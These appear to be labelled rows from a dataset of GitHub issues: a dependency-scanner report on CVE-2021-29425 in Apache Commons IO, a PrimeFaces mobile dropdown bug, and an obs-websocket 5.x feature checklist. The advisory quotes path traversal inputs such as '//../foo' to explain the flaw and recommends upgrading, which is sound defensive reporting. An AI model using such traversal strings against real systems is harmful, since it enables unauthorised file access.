/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,canner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,SEARCH-NCJIS-nibrs/web/nibrs-web/target/nibrs-web/WEB-INF/lib/commons-io-2.6.jar</p> <p> Dependency Hierarchy: - tika-parsers-1.18.jar (Root Library) - :x: **commons-io-2.6.jar** (Vulnerable Library) </details> <details><summary><b>commons-io-2.5.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/pom.xml</p> <p>Path to vulnerable library: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/target/nibrs-fbi-service-1.0.0/WEB-INF/lib/commons-io-2.5.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.5/commons-io-2.5.jar</p> <p> Dependency Hierarchy: - :x: **commons-io-2.5.jar** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/samq-ghdemo/SEARCH-NCJIS-nibrs/commit/2643373aa9a184ff4ea81e98caf4009bf2ee8e91">2643373aa9a184ff4ea81e98caf4009bf2ee8e91</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value. <p>Publish Date: 2021-04-13 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425>CVE-2021-29425</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425</a></p> <p>Release Date: 2021-04-13</p> <p>Fix Resolution: commons-io:commons-io:2.7</p> </p> </details> <p></p> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.6","packageFilePaths":["/tools/nibrs-route/pom.xml","/tools/nibrs-flatfile/pom.xml","/tools/nibrs-staging-data-common/pom.xml","/web/nibrs-web/pom.xml","/tools/nibrs-summary-report-common/pom.xml","/tools/nibrs-summary-report/pom.xml","/tools/nibrs-xmlfile/pom.xml","/tools/nibrs-common/pom.xml","/tools/nibrs-validate-common/pom.xml","/tools/nibrs-staging-data/pom.xml","/tools/nibrs-validation/pom.xml"],"isTransitiveDependency":true,"dependencyTree":"org.apache.tika:tika-parsers:1.18;commons-io:commons-io:2.6","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"},{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.5","packageFilePaths":["/tools/nibrs-fbi-service/pom.xml"],"isTransitiveDependency":false,"dependencyTree":"commons-io:commons-io:2.5","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"}],"baseBranches":["master"],"vulnerabilityIdentifier":"CVE-2021-29425","vulnerabilityDetails":"In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425","cvss3Severity":"medium","cvss3Score":"5.3","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Unchanged","C":"Low","UI":"None","AV":"Network","I":"None"},"extraData":{}}</REMEDIATE> -->
True
CVE-2021-29425 (Medium) detected in commons-io-2.6.jar, commons-io-2.5.jar - ## CVE-2021-29425 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>commons-io-2.6.jar</b>, <b>commons-io-2.5.jar</b></p></summary> <p> <details><summary><b>commons-io-2.6.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-route/pom.xml</p> <p>Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,canner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,SEARCH-NCJIS-nibrs/web/nibrs-web/target/nibrs-web/WEB-INF/lib/commons-io-2.6.jar</p> <p> Dependency Hierarchy: - tika-parsers-1.18.jar (Root Library) - :x: **commons-io-2.6.jar** (Vulnerable Library) </details> <details><summary><b>commons-io-2.5.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/pom.xml</p> <p>Path to vulnerable library: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/target/nibrs-fbi-service-1.0.0/WEB-INF/lib/commons-io-2.5.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.5/commons-io-2.5.jar</p> <p> Dependency Hierarchy: - :x: **commons-io-2.5.jar** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/samq-ghdemo/SEARCH-NCJIS-nibrs/commit/2643373aa9a184ff4ea81e98caf4009bf2ee8e91">2643373aa9a184ff4ea81e98caf4009bf2ee8e91</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value. <p>Publish Date: 2021-04-13 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425>CVE-2021-29425</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425</a></p> <p>Release Date: 2021-04-13</p> <p>Fix Resolution: commons-io:commons-io:2.7</p> </p> </details> <p></p> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.6","packageFilePaths":["/tools/nibrs-route/pom.xml","/tools/nibrs-flatfile/pom.xml","/tools/nibrs-staging-data-common/pom.xml","/web/nibrs-web/pom.xml","/tools/nibrs-summary-report-common/pom.xml","/tools/nibrs-summary-report/pom.xml","/tools/nibrs-xmlfile/pom.xml","/tools/nibrs-common/pom.xml","/tools/nibrs-validate-common/pom.xml","/tools/nibrs-staging-data/pom.xml","/tools/nibrs-validation/pom.xml"],"isTransitiveDependency":true,"dependencyTree":"org.apache.tika:tika-parsers:1.18;commons-io:commons-io:2.6","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"},{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.5","packageFilePaths":["/tools/nibrs-fbi-service/pom.xml"],"isTransitiveDependency":false,"dependencyTree":"commons-io:commons-io:2.5","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"}],"baseBranches":["master"],"vulnerabilityIdentifier":"CVE-2021-29425","vulnerabilityDetails":"In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425","cvss3Severity":"medium","cvss3Score":"5.3","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Unchanged","C":"Low","UI":"None","AV":"Network","I":"None"},"extraData":{}}</REMEDIATE> -->
non_main
cve medium detected in commons io jar commons io jar cve medium severity vulnerability vulnerable libraries commons io jar commons io jar commons io jar the apache commons io library contains utility classes stream implementations file filters file comparators endian transformation classes and much more library home page a href path to dependency file search ncjis nibrs tools nibrs route pom xml path to vulnerable library home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar canner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar search ncjis nibrs web nibrs web target nibrs web web inf lib commons io jar dependency hierarchy tika parsers jar root library x commons io jar vulnerable library commons io jar the apache commons io library contains utility classes stream implementations file filters file comparators endian transformation classes and much more library home page a href path to dependency file search ncjis nibrs tools nibrs fbi service pom xml path to vulnerable library search ncjis nibrs tools nibrs fbi service target nibrs fbi service web inf lib commons io jar home wss scanner repository commons io commons io commons io jar dependency hierarchy x commons io jar vulnerable library found in head commit a href found in base branch master vulnerability details in apache commons io before when invoking the method filenameutils normalize with an improper input string like foo or foo the result would be the same value thus possibly providing access to files in the parent directory but not further above thus limited path traversal if the calling code would use the result to construct a path value publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact low integrity impact none availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution commons io commons io isopenpronvulnerability false ispackagebased true isdefaultbranch true packages istransitivedependency true dependencytree org apache tika tika parsers commons io commons io isminimumfixversionavailable true minimumfixversion commons io commons io packagetype java groupid commons io packagename commons io packageversion packagefilepaths istransitivedependency false dependencytree commons io commons io isminimumfixversionavailable true minimumfixversion commons io commons io basebranches vulnerabilityidentifier cve vulnerabilitydetails in apache commons io before when invoking the method filenameutils normalize with an improper input string like foo or foo the result would be the same value thus possibly providing access to files in the parent directory but not further above thus limited path traversal if the calling code would use the result to construct a path value vulnerabilityurl
0
63,839
18,014,055,881
IssuesEvent
2021-09-16 12:02:55
primefaces/primefaces
https://api.github.com/repos/primefaces/primefaces
opened
selectonemenu filter="true" causes dropdown to collapse immediately
defect
**Describe the defect** When creating a SelectOneMenu that allows filtering via a textfield (property `filter="true"`), the menu immediately collapses on mobile devices after opening. **Environment:** - PF Version: _10.0_ - Server: _Payara 5.194_ - Affected browsers: _e.g. Chrome on Android (and Desktop in mobile mode), Firefox on Android_ - Unaffected browsers: _e.g. Chrome on Desktop, Firefox on Desktop (and in mobile mode)_ **To Reproduce** Steps to reproduce the behavior: 1. Have a filterable `p:selectOneMenu` 2. Try to expand it by tapping on it **Expected behavior** The menu expands. Searching and selecting should be possible as it is in desktop browsers. **Actual behaviour (Chrome on Android /)** The menu as well as the keyboard collapses. **Actual behaviour (Chrome)** The menu collapses, but the keyboard remains open. **Example XHTML** ```html <p:selectOneMenu id="parent" value="#{categoryBean.parent}" style="width: 100%;" filter="true" filterMatchMode="contains"> <f:selectItems value="#{categoryBean.parents}" var="parent" itemLabel="#{parent}" itemValue="#{parent}" /> </p:selectOneMenu> ``` **Example Bean** ```java @Named @ViewScoped public class CategoryBean implements Serializable { @Getter @Setter private List<String> parents = List.of("One", "Two", "Three"); @Getter @Setter private String parent; } ```
1.0
selectonemenu filter="true" causes dropdown to collapse immediately - **Describe the defect** When creating a SelectOneMenu that allows filtering via a textfield (property `filter="true"`), the menu immediately collapses on mobile devices after opening. **Environment:** - PF Version: _10.0_ - Server: _Payara 5.194_ - Affected browsers: _e.g. Chrome on Android (and Desktop in mobile mode), Firefox on Android_ - Unaffected browsers: _e.g. Chrome on Desktop, Firefox on Desktop (and in mobile mode)_ **To Reproduce** Steps to reproduce the behavior: 1. Have a filterable `p:selectOneMenu` 2. Try to expand it by tapping on it **Expected behavior** The menu expands. Searching and selecting should be possible as it is in desktop browsers. **Actual behaviour (Chrome on Android /)** The menu as well as the keyboard collapses. **Actual behaviour (Chrome)** The menu collapses, but the keyboard remains open. **Example XHTML** ```html <p:selectOneMenu id="parent" value="#{categoryBean.parent}" style="width: 100%;" filter="true" filterMatchMode="contains"> <f:selectItems value="#{categoryBean.parents}" var="parent" itemLabel="#{parent}" itemValue="#{parent}" /> </p:selectOneMenu> ``` **Example Bean** ```java @Named @ViewScoped public class CategoryBean implements Serializable { @Getter @Setter private List<String> parents = List.of("One", "Two", "Three"); @Getter @Setter private String parent; } ```
non_main
selectonemenu filter true causes dropdown to collapse immediately describe the defect when creating a selectonemenu that allows filtering via a textfield property filter true the menu immediately collapses on mobile devices after opening environment pf version server payara affected browsers e g chrome on android and desktop in mobile mode firefox on android unaffected browsers e g chrome on desktop firefox on desktop and in mobile mode to reproduce steps to reproduce the behavior have a filterable p selectonemenu try to expand it by tapping on it expected behavior the menu expands searching and selecting should be possible as it is in desktop browsers actual behaviour chrome on android the menu as well as the keyboard collapses actual behaviour chrome the menu collapses but the keyboard remains open example xhtml html p selectonemenu id parent value categorybean parent style width filter true filtermatchmode contains example bean java named viewscoped public class categorybean implements serializable getter setter private list parents list of one two three getter setter private string parent
0
423,424
28,508,461,467
IssuesEvent
2023-04-19 00:41:04
anthonyrave/riot-api-connector
https://api.github.com/repos/anthonyrave/riot-api-connector
closed
Create a documentation
documentation
The package requires a documentation to help developers to use it. - [ ] Create a documentation repository - [ ] Deploy the documentation on the web
1.0
Create a documentation - The package requires a documentation to help developers to use it. - [ ] Create a documentation repository - [ ] Deploy the documentation on the web
non_main
create a documentation the package requires a documentation to help developers to use it create a documentation repository deploy the documentation on the web
0
4,776
24,599,093,464
IssuesEvent
2022-10-14 10:51:56
obs-websocket-community-projects/obs-websocket-java
https://api.github.com/repos/obs-websocket-community-projects/obs-websocket-java
closed
Support OBS WebSocket 5.X
help wanted maintainability 5.X.X Support
# Description The 5.X version is approaching and is bringing breaking changes. # Status - Requests and Responses - General - [x] GetVersion - [x] BroadcastCustomEvent - [x] GetStats - [x] GetHotkeyList - [x] TriggerHotkeyByName - [x] TriggerHotkeyByKeySequence - [x] GetProjectorList - [x] OpenProjector - [x] CloseProjector - [x] GetStudioModeEnabled - [x] SetStudioModeEnabled - [x] Sleep - Config - [x] GetPersistentData - [x] SetPersistentData - [x] ~~GetGlobalPersistentData~~ - [x] ~~SetGlobalPersistentData~~ - [x] GetSceneCollectionList - [x] SetCurrentSceneCollection - [x] CreateSceneCollection - [x] RemoveSceneCollection - [x] GetProfileList - [x] SetCurrentProfile - [x] CreateProfile - [x] RemoveProfile - [x] GetProfileParameter - [x] SetProfileParameter - [x] ~~GetProfilePersistentData~~ - [x] ~~SetProfilePersistentData~~ - [x] GetVideoSettings - [x] SetVideoSettings - [x] GetStreamServiceSettings - [x] SetStreamServiceSettings - [ ] GetStreamBitrateSetting - [ ] SetStreamBitrateSetting - Sources - [ ] GetSourceList - [x] GetSourceActive - [x] GetSourceScreenshot - [x] SaveSourceScreenshot - Scenes - [x] GetSceneList - [x] GetCurrentProgramScene - [x] SetCurrentProgramScene - [x] GetCurrentPreviewScene - [x] SetCurrentPreviewScene - [x] CreateScene - [x] RemoveScene - [x] SetSceneName - [ ] ~~SetSceneIndex~~ - [x] GetSceneTransitionOverride - [x] SetSceneTransitionOverride - [x] DeleteSceneTransitionOverride - Inputs - [x] GetInputList - [x] CreateInput - [x] RemoveInput - [x] SetInputName - [x] GetInputKindList - [x] GetSpecialInputNames - [x] GetInputDefaultSettings - [x] GetInputSettings - [x] SetInputSettings - [x] GetInputMute - [x] SetInputMute - [x] ToggleInputMute - [x] GetInputVolume - [x] SetInputVolume - [x] GetInputAudioSyncOffset - [x] SetInputAudioSyncOffset - [x] GetInputTracks - [ ] SetInputTracks - [x] GetInputMonitorType - [x] SetInputMonitorType - [x] GetInputPropertiesListPropertyItems - [x] PressInputPropertiesButton - Transitions - [x] GetTransitionList - [x] GetCurrentTransition - [x] SetCurrentTransition - [ ] CreateTransition - [ ] RemoveTransition - [x] SetCurrentTransitionDuration - [x] GetTransitionSettings - [x] SetTransitionSettings - [x] ReleaseTbar - [x] SetTbarPosition - [x] TriggerStudioModeTransition - Filters - [x] GetSourceFilterList - [x] CreateSourceFilter - [x] RemoveSourceFilter - [ ] GetSourceFilterDefaultSettings - [x] GetSourceFilter - [x] SetSourceFilterIndex - [x] SetSourceFilterSettings - [x] SetSourceFilterEnabled - Scene Items - [x] GetSceneItemList - [x] GetGroupSceneItemList - [x] CreateSceneItem - [x] RemoveSceneItem - [x] DuplicateSceneItem - [x] GetSceneItemTransform - [x] SetSceneItemTransform - [x] GetSceneItemEnabled - [x] SetSceneItemEnabled - [x] GetSceneItemLocked - [x] SetSceneItemLocked - [ ] SetSceneItemColor - [x] GetSceneItemColor - [x] SetSceneItemIndex - Outputs - [ ] GetVirtualCamStatus - [ ] ToggleVirtualCam - [ ] StartVirtualCam - [ ] StopVirtualCam - [x] GetReplayBufferStatus - [x] ToggleReplayBuffer - [ ] StartReplayBuffer - [x] StopReplayBuffer - [x] SaveReplayBuffer - [x] GetLastReplayBufferReplay - [ ] GetReplayBufferTime - [ ] SetReplayBufferTime - [x] GetOutputList - [ ] GetOutputStatus - [x] ToggleOutput - [x] StartOutput - [x] StopOutput - [ ] GetOutputSettings - [ ] SetOutputSettings - Stream - [x] GetStreamStatus - [x] ToggleStream - [x] StartStream - [x] StopStream - [x] SendStreamCaption - Record - [x] GetRecordStatus - [x] ToggleRecord - [x] StartRecord - [x] StopRecord - [x] ToggleRecordPause - [x] PauseRecord - [x] ResumeRecord - [x] GetRecordDirectory - [x] SetRecordDirectory - [x] GetRecordFilenameFormatting - [x] SetRecordFilenameFormatting - Media Inputs - [x] GetMediaInputStatus - [x] OffsetMediaInputTimecode - [x] SetMediaInputTimecode - [x] SetMediaInputPauseState - [x] StopMediaInput - [x] RestartMediaInput - [x] NextMediaInputPlaylistItem - [x] PreviousMediaInputPlaylistItem - Events - General - [x] ExitStarted - [x] StudioModeStateChanged - [x] CustomEvent - Config - [x] CurrentSceneCollectionChanged - [x] SceneCollectionListChanged - [x] CurrentProfileChanged - [x] ProfileListChanged - Scenes - [x] SceneCreated - [x] SceneRemoved - [x] SceneNameChanged - [x] ~~CurrentSceneChanged~~ - [x] CurrentProgramSceneChanged - [x] CurrentPreviewSceneChanged - [x] SceneListChanged - Inputs - [x] InputCreated - [x] InputRemoved - [x] InputNameChanged - [x] InputMuteStateChanged - [x] InputVolumeChanged - [x] InputAudioSyncOffsetChanged - [x] InputAudioTracksChanged - Transitions - [ ] TransitionCreated - [ ] TransitionRemoved - [ ] TransitionNameChanged - [ ] CurrentTransitionChanged - [ ] TransitionStarted - [ ] TransitionEnded - Filters - [ ] FilterCreated - [ ] FilterRemoved - [ ] FilterNameChanged - [ ] SourceFilterAdded - [ ] SourceFilterRemoved - [ ] SourceFilterListReindexed - Outputs - [x] StreamStateChanged - [x] RecordStateChanged - [x] ReplayBufferStateChanged - [x] VirtualcamStateChanged - [x] ReplayBufferSaved - Scene Items - [x] SceneItemCreated - [x] SceneItemRemoved - [x] SceneItemListReindexed - [x] SceneItemEnableStateChanged - [x] SceneItemLockStateChanged - [ ] SceneItemTransformChanged - Media Inputs - [x] MediaInputPlaybackStarted - [x] MediaInputPlaybackEnded - [x] MediaInputActionTriggered - High Volume - [x] InputVolumeMeters - [x] InputActiveStateChanged - [x] InputShowStateChanged
True
Support OBS WebSocket 5.X - # Description The 5.X version is approaching and is bringing breaking changes. # Status - Requests and Responses - General - [x] GetVersion - [x] BroadcastCustomEvent - [x] GetStats - [x] GetHotkeyList - [x] TriggerHotkeyByName - [x] TriggerHotkeyByKeySequence - [x] GetProjectorList - [x] OpenProjector - [x] CloseProjector - [x] GetStudioModeEnabled - [x] SetStudioModeEnabled - [x] Sleep - Config - [x] GetPersistentData - [x] SetPersistentData - [x] ~~GetGlobalPersistentData~~ - [x] ~~SetGlobalPersistentData~~ - [x] GetSceneCollectionList - [x] SetCurrentSceneCollection - [x] CreateSceneCollection - [x] RemoveSceneCollection - [x] GetProfileList - [x] SetCurrentProfile - [x] CreateProfile - [x] RemoveProfile - [x] GetProfileParameter - [x] SetProfileParameter - [x] ~~GetProfilePersistentData~~ - [x] ~~SetProfilePersistentData~~ - [x] GetVideoSettings - [x] SetVideoSettings - [x] GetStreamServiceSettings - [x] SetStreamServiceSettings - [ ] GetStreamBitrateSetting - [ ] SetStreamBitrateSetting - Sources - [ ] GetSourceList - [x] GetSourceActive - [x] GetSourceScreenshot - [x] SaveSourceScreenshot - Scenes - [x] GetSceneList - [x] GetCurrentProgramScene - [x] SetCurrentProgramScene - [x] GetCurrentPreviewScene - [x] SetCurrentPreviewScene - [x] CreateScene - [x] RemoveScene - [x] SetSceneName - [ ] ~~SetSceneIndex~~ - [x] GetSceneTransitionOverride - [x] SetSceneTransitionOverride - [x] DeleteSceneTransitionOverride - Inputs - [x] GetInputList - [x] CreateInput - [x] RemoveInput - [x] SetInputName - [x] GetInputKindList - [x] GetSpecialInputNames - [x] GetInputDefaultSettings - [x] GetInputSettings - [x] SetInputSettings - [x] GetInputMute - [x] SetInputMute - [x] ToggleInputMute - [x] GetInputVolume - [x] SetInputVolume - [x] GetInputAudioSyncOffset - [x] SetInputAudioSyncOffset - [x] GetInputTracks - [ ] SetInputTracks - [x] GetInputMonitorType - [x] SetInputMonitorType - [x] GetInputPropertiesListPropertyItems - [x] PressInputPropertiesButton - Transitions - [x] GetTransitionList - [x] GetCurrentTransition - [x] SetCurrentTransition - [ ] CreateTransition - [ ] RemoveTransition - [x] SetCurrentTransitionDuration - [x] GetTransitionSettings - [x] SetTransitionSettings - [x] ReleaseTbar - [x] SetTbarPosition - [x] TriggerStudioModeTransition - Filters - [x] GetSourceFilterList - [x] CreateSourceFilter - [x] RemoveSourceFilter - [ ] GetSourceFilterDefaultSettings - [x] GetSourceFilter - [x] SetSourceFilterIndex - [x] SetSourceFilterSettings - [x] SetSourceFilterEnabled - Scene Items - [x] GetSceneItemList - [x] GetGroupSceneItemList - [x] CreateSceneItem - [x] RemoveSceneItem - [x] DuplicateSceneItem - [x] GetSceneItemTransform - [x] SetSceneItemTransform - [x] GetSceneItemEnabled - [x] SetSceneItemEnabled - [x] GetSceneItemLocked - [x] SetSceneItemLocked - [ ] SetSceneItemColor - [x] GetSceneItemColor - [x] SetSceneItemIndex - Outputs - [ ] GetVirtualCamStatus - [ ] ToggleVirtualCam - [ ] StartVirtualCam - [ ] StopVirtualCam - [x] GetReplayBufferStatus - [x] ToggleReplayBuffer - [ ] StartReplayBuffer - [x] StopReplayBuffer - [x] SaveReplayBuffer - [x] GetLastReplayBufferReplay - [ ] GetReplayBufferTime - [ ] SetReplayBufferTime - [x] GetOutputList - [ ] GetOutputStatus - [x] ToggleOutput - [x] StartOutput - [x] StopOutput - [ ] GetOutputSettings - [ ] SetOutputSettings - Stream - [x] GetStreamStatus - [x] ToggleStream - [x] StartStream - [x] StopStream - [x] SendStreamCaption - Record - [x] GetRecordStatus - [x] ToggleRecord - [x] StartRecord - [x] StopRecord - [x] ToggleRecordPause - [x] PauseRecord - [x] ResumeRecord - [x] GetRecordDirectory - [x] SetRecordDirectory - [x] GetRecordFilenameFormatting - [x] SetRecordFilenameFormatting - Media Inputs - [x] GetMediaInputStatus - [x] OffsetMediaInputTimecode - [x] SetMediaInputTimecode - [x] SetMediaInputPauseState - [x] StopMediaInput - [x] RestartMediaInput - [x] NextMediaInputPlaylistItem - [x] PreviousMediaInputPlaylistItem - Events - General - [x] ExitStarted - [x] StudioModeStateChanged - [x] CustomEvent - Config - [x] CurrentSceneCollectionChanged - [x] SceneCollectionListChanged - [x] CurrentProfileChanged - [x] ProfileListChanged - Scenes - [x] SceneCreated - [x] SceneRemoved - [x] SceneNameChanged - [x] ~~CurrentSceneChanged~~ - [x] CurrentProgramSceneChanged - [x] CurrentPreviewSceneChanged - [x] SceneListChanged - Inputs - [x] InputCreated - [x] InputRemoved - [x] InputNameChanged - [x] InputMuteStateChanged - [x] InputVolumeChanged - [x] InputAudioSyncOffsetChanged - [x] InputAudioTracksChanged - Transitions - [ ] TransitionCreated - [ ] TransitionRemoved - [ ] TransitionNameChanged - [ ] CurrentTransitionChanged - [ ] TransitionStarted - [ ] TransitionEnded - Filters - [ ] FilterCreated - [ ] FilterRemoved - [ ] FilterNameChanged - [ ] SourceFilterAdded - [ ] SourceFilterRemoved - [ ] SourceFilterListReindexed - Outputs - [x] StreamStateChanged - [x] RecordStateChanged - [x] ReplayBufferStateChanged - [x] VirtualcamStateChanged - [x] ReplayBufferSaved - Scene Items - [x] SceneItemCreated - [x] SceneItemRemoved - [x] SceneItemListReindexed - [x] SceneItemEnableStateChanged - [x] SceneItemLockStateChanged - [ ] SceneItemTransformChanged - Media Inputs - [x] MediaInputPlaybackStarted - [x] MediaInputPlaybackEnded - [x] MediaInputActionTriggered - High Volume - [x] InputVolumeMeters - [x] InputActiveStateChanged - [x] InputShowStateChanged
main
support obs websocket x description the x version is approaching and is bringing breaking changes status requests and responses general getversion broadcastcustomevent getstats gethotkeylist triggerhotkeybyname triggerhotkeybykeysequence getprojectorlist openprojector closeprojector getstudiomodeenabled setstudiomodeenabled sleep config getpersistentdata setpersistentdata getglobalpersistentdata setglobalpersistentdata getscenecollectionlist setcurrentscenecollection createscenecollection removescenecollection getprofilelist setcurrentprofile createprofile removeprofile getprofileparameter setprofileparameter getprofilepersistentdata setprofilepersistentdata getvideosettings setvideosettings getstreamservicesettings setstreamservicesettings getstreambitratesetting setstreambitratesetting sources getsourcelist getsourceactive getsourcescreenshot savesourcescreenshot scenes getscenelist getcurrentprogramscene setcurrentprogramscene getcurrentpreviewscene setcurrentpreviewscene createscene removescene setscenename setsceneindex getscenetransitionoverride setscenetransitionoverride deletescenetransitionoverride inputs getinputlist createinput removeinput setinputname getinputkindlist getspecialinputnames getinputdefaultsettings getinputsettings setinputsettings getinputmute setinputmute toggleinputmute getinputvolume setinputvolume getinputaudiosyncoffset setinputaudiosyncoffset getinputtracks setinputtracks getinputmonitortype setinputmonitortype getinputpropertieslistpropertyitems pressinputpropertiesbutton transitions gettransitionlist getcurrenttransition setcurrenttransition createtransition removetransition setcurrenttransitionduration gettransitionsettings settransitionsettings 